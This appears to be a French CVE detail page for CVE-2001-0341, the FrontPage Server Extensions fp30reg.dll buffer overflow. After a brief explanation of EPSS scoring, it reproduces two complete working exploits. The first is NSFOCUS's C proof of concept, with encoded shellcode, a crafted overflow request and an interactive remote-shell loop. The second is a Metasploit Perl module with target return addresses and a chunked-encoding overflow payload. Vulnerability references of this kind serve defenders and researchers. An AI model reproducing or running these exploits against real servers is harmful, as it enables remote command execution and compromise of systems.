CVE-2001-0341 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

// source: https://www.securityfocus.com/bid/2906/info Due to an unchecked buffer in a subcomponent of FrontPage Server Extensions (Visual InterDev RAD Remote Deployment Support), a specially crafted request via 'fp30reg.dll' could allow a user to execute arbitrary commands in the context of IWAM_machinename on a host running IIS 5.0. A host running IIS 4.0, could allow the execution of arbitrary commands in the SYSTEM context. /* * fpse2000ex.c - Proof of concept code for fp30reg.dll overflow bug. * Copyright (c) 2001 - Nsfocus.com * * DISCLAIMS: * This is a proof of concept code. This code is for test purpose * only and should not be run against any host without permission from * the system administrator. * * NSFOCUS Security Team <security@nsfocus.com> * http://www.nsfocus.com */ #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <signal.h> #include <unistd.h> #include <errno.h> /* fat shellcode ;) */ char shellcode[] = "\xeb\x1a\x5f\x56\x56\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x5\x34" "\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe1\xff\xff\xff\xff\x21\x46\x2b\x46" "\xb6\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x4e\x5c\x55\x55\x13\xed\xa8\xaa\xaa\x12" "\x66\x66\x66\x66\x59\x1\x6d\x2f\x66\x5d\x55\x55\xaa\xaa\xaa\xaa\x21\xef\xa2" "\x21\x22\x2e\xaa\xaa\xaa\x23\x27\x62\x5d\x55\x55\x21\xff\xa2\x21\x28\x22\xaa" "\xaa\xaa\x23\x2f\x6e\x5d\x55\x55\x21\xe7\xa2\x21\xfb\xa2\x23\x3f\x6a\x5d\x55" "\x55\x43\x61\xaf\xaa\xaa\x25\x2f\x16\x5d\x55\x55\x27\x17\x5a\x5d\x55\x55\xce" "\xb\xaa\xaa\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x2f\x5a\x5d" "\x55\x55\x55\x55\x55\x55\x21\x2f\x16\x5d\x55\x55\x29\x42\xad\x23\x2f\x5e\x5d" "\x55\x55\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x4a\xdd\x42\xcd\xaf\xaa\xaa\x29\x17" "\x66\x5d\x55\x55\xaa\xa5\x2f\x77\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x2b\x6b" "\xaa\xaa\xab\xaa\x23\x27\x12\x5d\x55\x55\x2b\x17\x12\x5d\x55\x55\xaa\xaa\xaa" "\xd2\xdf\xa0\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x3f\x12\x5d\x55\x55" "\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x2f\x30\x70\xab\xaa\xaa\x21\x27" "\x12\x5d\x55\x55\x21\xfb\x96\x21\x2f\x12\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba" "\x2b\x53\xfa\xef\xaa\xaa\xa5\x2f\xd3\xab\xaa\xaa\x21\x3f\x12\x5d\x55\x55\x21" "\xe8\x96\x21\x27\x12\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x3f\x12\x5d\x55\x55\x23" "\x3f\x1e\x5d\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x12\x5d\x55" "\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x2b\x90\xe1\xef\xf8\xe4\xa5" "\x2f\x99\xab\xaa\xaa\x21\x2f\x6\x5d\x55\x55\x2b\xd2\xae\xef\xe6\x99\x98\xa5" "\x2f\x8a\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x23\x27\xe\x5d\x55\x55\x21\x3f" "\x1e\x5d\x55\x55\x21\x2f\x12\x5d\x55\x55\xa9\xe8\x8a\x23\x2f\x6\x5d\x55\x55" "\x6d\x2f\x2\x5d\x55\x55\xaa\xaa\xaa\xaa\x41\xb4\x21\x27\x2\x5d\x55\x55\x29\x6b" "\xab\x23\x27\x2\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x29\x68\xae\x23\x3f\x6\x5d" "\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\x27\x2\x5d\x55\x55\x91\xe2\xb2\xa5\x27" "\x6a\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8\x21\x27\x12\x5d\x55\x55\x2b" "\x96\xab\xed\xcf\xde\xfa\xa5\x2f\xa\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8" "\x21\x27\x12\x5d\x55\x55\x2b\xd6\xab\xae\xd8\xc5\xc9\xeb\xa5\x2f\x2e\xaa\xaa" "\xaa\x21\x3f\x2\x5d\x55\x55\xa9\x3f\x2\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55" "\x21\x2f\x1e\x5d\x55\x55\x21\xe2\x8e\x99\x6a\xcc\x21\xae\xa0\x23\x2f\x6\x5d" "\x55\x55\x21\x27\x1e\x5d\x55\x55\x21\xfb\xba\x21\x2f\x6\x5d\x55\x55\x27\xe6" "\xba\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55" "\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55\x21\x2f" "\x1e\x5d\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x3f\x6\x5d\x55\x55\x21\x2f\x6\x5d" "\x55\x55\xa9\x2f\x12\x5d\x55\x55\x23\x2f\x66\x5d\x55\x55\x41\xaf\x43\xa7\x55" "\x55\x55\x43\xbc\x54\x55\x55\x27\x17\x5a\x5d\x55\x55\x21\xed\xa2\xce\x9\xaa" "\xaa\xaa\xaa\x29\x17\x66\x5d\x55\x55\xaa\xdf\xaf\x43\xf4\xa9\xaa\xaa\x6d\x2f" "\x6\x5d\x55\x55\xab\xaa\xaa\xaa\x41\xa5\x21\x27\x6\x5d\x55\x55\x29\x6b\xab\x23" "\x27\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xa2\xd7\xc4\x21\x5e\x21\x3f\x16" "\x5d\x55\x55\xf8\x21\x2f\xe\x5d\x55\x55\xfa\x55\x3f\x66\x5d\x55\x55\x91\x5e" "\x3a\xe9\xe1\xe9\xe1\x21\x27\x6\x5d\x55\x55\x23\x2e\x27\x7a\x5d\x55\x55\x41" "\xa5\x21\x3f\x16\x5d\x55\x55\x29\x68\xab\x23\x3f\x16\x5d\x55\x55\x21\x2f\x16" "\x5d\x55\x55\xa5\x14\xa2\x2f\x63\xdf\xba\x21\x3f\x16\x5d\x55\x55\xa5\x14\xe8" "\xab\x2f\x6a\xde\xa8\x41\xa8\x41\x78\x21\x27\x16\x5d\x55\x55\x29\x6b\xab\x23" "\x27\x16\x5d\x55\x55\x43\xd0\x55\x55\x55\x6d\x2f\x8e\x5d\x55\x55\xa6\xaa\xaa" "\xaa\x6d\x2f\x82\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x2f\x86\x5d\x55\x55\xab\xaa" "\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xe2\x5d\x55\x55" "\xfa\x27\x27\xe6\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" "\xe9\xe1\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xea\x5d\x55\x55" "\xfa\x27\x27\xee\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" "\xe9\xe1\x27\x17\xca\x5d\x55\x55\x99\x6a\x13\xbb\xaa\xaa\xaa\x58\x1\x6d\x2f" "\x26\x5d\x55\x55\xab\xab\xaa\xaa\xcc\x6d\x2f\x3a\x5d\x55\x55\xaa\xaa\x21\x3f" "\xee\x5d\x55\x55\x23\x3f\x32\x5d\x55\x55\x21\x2f\xe2\x5d\x55\x55\x23\x2f\x36" "\x5d\x55\x55\x21\x27\xe2\x5d\x55\x55\x23\x27\xa\x5d\x55\x55\x6d\x2f\x6\x5d\x55" "\x55\xaa\xaa\xaa\xaa\x21\x5e\x27\x3f\xfa\x5d\x55\x55\xf8\x27\x2f\xca\x5d\x55" "\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa\x21\x27\x16\x5d\x55" "\x55\xfb\xc0\xaa\x55\x3f\x72\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x2f" "\x6\x5d\x55\x55\x21\x3f\x16\x5d\x55\x55\x29\x68\xa2\x23\x3f\x16\x5d\x55\x55" "\x21\x5e\xc0\xaa\xc0\xaa\x27\x2f\x96\x5d\x55\x55\xfa\xc2\xaa\xa2\xaa\xaa\x27" "\x27\x56\x5d\x55\x55\xfb\x21\x3f\xe6\x5d\x55\x55\xf8\x55\x3f\x4a\x5d\x55\x55" "\x91\x5e\x3a\xe9\xe1\xe9\xe1\x6d\x2f\x6\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e" "\xc0\xaa\x27\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\x29\x6b\xa3\xfb" "\x21\x3f\x6a\x5d\x55\x55\xf8\x55\x3f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9" "\xe1\x12\xab\xaa\xaa\xaa\x2f\x6a\xa5\x2e\xf4\xab\xaa\xaa\x21\x5e\xc0\xaa\xc0" "\xaa\x27\x27\x96\x5d\x55\x55\xfb\xc2\xaa\xa2\xaa\xaa\x27\x3f\x56\x5d\x55\x55" "\xf8\x21\x2f\xe6\x5d\x55\x55\xfa\x55\x3f\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" "\xe9\xe1\x29\x17\x96\x5d\x55\x55\xaa\xd4\xcb\x21\x5e\xc0\xaa\x27\x27\x96\x5d" "\x55\x55\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27" "\xe6\x5d\x55\x55\xfb\x55\x3f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29" "\x17\x96\x5d\x55\x55\xaa\xd4\x8c\x21\x5e\xc0\xaa\x27\x3f\x96\x5d\x55\x55\xf8" "\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x62\x5d\x55" "\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x68\xaa\xaa\xaa\x6d\x2f\x96\x5d\x55\x55" "\xaa\xa2\xaa\xaa\x21\x5e\x27\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55" "\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" "\xe9\xe1\x23\x2f\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xab\xde\xf2\x6d\x2f\x6" "\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x6\x5d\x55\x55\xf8\x21" "\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\xfb\x21\x3f\xea\x5d\x55\x55" "\xf8\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x12\xab\xaa\xaa\xaa" "\x2f\x6a\xde\xbc\x21\x5e\xc2\x55\x55\x55\xd5\x55\x3f\x46\x5d\x55\x55\x91\x5e" "\x3a\xe9\xe1\xe9\xe1\x41\x4b\x41\x87\x21\x5e\xc0\xaa\x27\x27\x96\x5d\x55\x55" "\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\xea\x5d" "\x55\x55\xfb\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x3f\x54" "\x55\x55\x41\x54\xf2\xfa\x21\x17\x16\x5d\x55\x55\x23\xed\x58\x69\x21\xee\x8e" "\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\x9a" "\x50\x55\x55\xe9\xd8\xcf\xcb\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde" "\xcf\xfa\xd8\xc5\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce" "\xc6\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa\xf8\xcf" "\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3\xc6\xcf\xaa\xf9\xc6" "\xcf\xcf\xda\xaa\xaa\xc9\xc7\xce\x84\xcf\xd2\xcf\xaa\xa7\xa0\xcf\xd2\xc3\xde" "\xa7\xa0\xaa\xf2\xe5\xf8\xee\xeb\xfe\xeb\xaa"; int resolv (char *host, long *ip) { struct hostent *hp; if ((*ip = inet_addr (host))<0) { if ((hp = gethostbyname (host)) == NULL) { fprintf (stderr, "%s: unknown host\n", host); exit (-1); } *ip = *(unsigned long *) hp->h_addr; } return 0; } int connect_to (char *hostname, short port) { struct sockaddr_in sa; int s; s = socket (AF_INET, SOCK_STREAM, 0); resolv (hostname, (long *) &sa.sin_addr.s_addr); sa.sin_family = AF_INET; sa.sin_port = htons (port); if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == -1) { perror("connect"); exit(-1); } return s; } void runshell (int sockd) { char buff[1024]; int ret; fd_set fds; printf("\nPress CTRL_C to exit the shell!\n"); for (;;) { FD_ZERO (&fds); FD_SET (0, &fds); FD_SET (sockd, &fds); if (select (sockd + 1, &fds, NULL, NULL, NULL) < 0) { exit (-1); } if (FD_ISSET (sockd, &fds)) { bzero (buff, sizeof buff); if ((ret=read(sockd,buff,sizeof(buff)))<1) { fprintf (stderr, "Connection closed\n"); exit (-1); } write(1,buff,ret); } if (FD_ISSET (0, &fds)) { bzero (buff, sizeof buff); ret=read(0,buff,sizeof(buff)); write(sockd,buff,ret); } } } main (int argc, char **argv) { char overbuff[400]; char buff[4096]; /* If system has the unicode bug, it is possible to attack fp4areg.dll */ /* char fppath[] = "/_vti_bin/..%c1%9cbin/fp4areg.dll"; */ char fppath[] = "/_vti_bin/_vti_aut/fp30reg.dll"; char server[] = "www.blahblah.com"; char retaddress[] = "\x62\x18\xd5\x67"; char jmpshell[] = "\xff\x66\x78"; int i, sockfd; int port = 80; if (argc < 2) { printf ("Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security Team\n\n"); printf ("Usage: %s victim [port]\n", argv[0]); exit (-1); } if (argc > 2) port = atoi (argv[2]); sockfd = connect_to (argv[1], port); bzero (overbuff, sizeof (overbuff)); bzero (buff, sizeof (buff)); memset (overbuff, 'a', 258); memcpy (overbuff, jmpshell, strlen (jmpshell)); strcpy (overbuff + 258, "%c"); for (i = 0; i < 0x50; i += 4) strncat (overbuff, retaddress, 4); strcat (overbuff, "aaa"); sprintf (buff, "GET %s?%s HTTP/1.1 \nHOST:%s\r\nContent-Type: \ text/html\nContent-Length:%d\r\nProxy_Connection: Keep-Alive\r\n\r\n%s", fppath, overbuff, server, strlen (shellcode), shellcode); printf ("buff len = %d\n", strlen (buff)); write (sockfd, buff, strlen (buff)); printf ("payload sent!\n"); if(read (sockfd, buff, strlen(buff))<0) { printf("EOF\n"); exit(-1); } else { if(memcmp(buff,"XORDATA",8)==0) { printf("exploit succeed\n"); /* Press Enter key to get the command prompt */ runshell (sockfd); } else { printf("exploit failed\n"); close(sockfd); exit(-1); } } }

source: https://www.securityfocus.com/bid/2906/info Due to an unchecked buffer in a subcomponent of FrontPage Server Extensions (Visual InterDev RAD Remote Deployment Support), a specially crafted request via 'fp30reg.dll' could allow a user to execute arbitrary commands in the context of IWAM_machinename on a host running IIS 5.0. A host running IIS 4.0, could allow the execution of arbitrary commands in the SYSTEM context. package Msf::Exploit::frontpage_fp30reg_chunked; use base "Msf::Exploit"; use strict; my $advanced = { }; my $info = { 'Name' => 'Frontpage fp30reg.dll Chunked Encoding', 'Version' => '$Revision: 1.19 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com> [Artistic License]', ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32' ], 'Priv' => 0, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 80], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00+&=%\x0a\x0d\x20", }, 'Description' => qq{ This is an exploit for the chunked encoding buffer overflow described in MS03-051 and originally reported by Brett Moore. This particular modules works against versions of Windows 2000 between SP0 and SP3. Service Pack 4 fixes the issue. }, 'Refs' => [ 'http://www.osvdb.org/577', 'http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx' ], 'DefaultTarget' => 0, 'Targets' => [ ['Windows 2000 SP0-SP3', 0x6c38a4d0], # from mfc42.dll ['Windows 2000 07/22/02', 0x67d44eb1], # from fp30reg.dll 07/22/2002 ['Windows 2000 10/06/99', 0x67d4665d], # from fp30reg.dll 10/06/1999 ], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode =$self->GetVar('EncodedPayload')->Payload; my @targets; my @offsets; my $pad; my $ret = defined($target_idx) ? ($self->Targets->[ $target_idx ]->[1]) : $self->Targets->[0]->[1]; my $pattern = Pex::PatternCreate(0xDEAD); my $count = 0; while (1) { if ($count % 3 == 0) { $self->PrintLine("[*] Refreshing remote process..."); my $res = $self->Check(); $count = 0; } substr($pattern, 128, 4, pack("V", $ret)); substr($pattern, 264, 4, pack("V", $ret)); substr($pattern, 160, 7, "\x2d\xff\xfe\xff\xff" . "\xff\xe0"); substr($pattern, 280, 512, "\x90" x 512); substr($pattern, 792, length($shellcode), $shellcode); my $request; $request = "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n"; $request .= "Host: $target_host:$target_port\r\n"; $request .= "Transfer-Encoding: chunked\r\n"; $request .= "\r\n"; $request .= "DEAD\r\n"; $request .= $pattern . "\r\n"; $request .= "0\r\n"; my $s = Msf::Socket->new( {"SSL" => $self->GetVar('SSL')} ); if (! $s->Tcp($target_host, $target_port)) { $self->FatalError("Could not connect: " . $s->GetError()); return; } $self->PrintLine("[*] Sending exploit request..."); $s->Send($request); sleep(1); $s->Close(); $count++; } return; } sub Check { my ($self) = @_; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $getreq = "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n". "Host: $target_host:$target_port\r\n\r\n"; my $s = Msf::Socket->new( {"SSL" => $self->GetVar('SSL')} ); if (! $s) { $self->PrintLine("[*] Could not create the socket"); return(0); } if (! $s->Tcp($target_host, $target_port)) { $self->PrintLine("[*] Could not connect: " . $s->GetError()); return(0); } $s->Send($getreq); my $res = $s->Recv(-1, 10); $s->Close(); if ($res !~ /501 Not Implemented/) { $self->PrintLine("[*] Frontpage component was not found"); return(0); } $self->PrintLine("[*] Frontpage component found"); return(1); }